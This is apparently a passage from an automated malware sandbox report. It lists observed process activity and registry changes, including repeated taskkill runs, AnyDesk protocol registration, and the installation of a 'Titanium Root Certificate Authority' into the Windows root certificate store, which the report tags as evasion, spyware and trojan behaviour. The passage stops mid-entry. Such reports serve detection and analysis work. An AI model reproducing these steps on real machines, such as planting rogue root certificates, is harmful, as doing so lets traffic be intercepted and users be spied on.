N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\FuturesClient.exe = "11000" C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_CLIPCHILDREN_OPTIMIZATION C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_CLIPCHILDREN_OPTIMIZATION\FuturesClient.exe = "1" C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files (x86)\AnyDesk\AnyDesk.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --play \"%1\"" C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" \"%1\"" C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3350944739-639801879-157714471-1000\{3A8DC9F9-B29E-48C5-A534-888D43A36AF1} C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\",0" C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell C:\Users\Admin\AppData\Roaming\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00360031003600440043003200320039002d0037003500450035002d0034003100410039002d0039004400330042002d003000460034003600420046003700320032003200310043007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00360038004500310042004600430036002d0039003100300036002d0034004500460045002d0039003500360042002d003600440046003600360036003900450036003600300039007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340046004500410038004400320042002d0030004500410042002d0034004200460033002d0038003000300041002d003000450030004300320046004100340045003200320045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340030003900380043004100410032002d0042004600420031002d0034004400360032002d0038003900350043002d004600410031003700300036004200410042003300460037007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0200000001000000cc0000001c0000006c000000010000000000000000000000000000000100000043004e003d0054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb99620000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 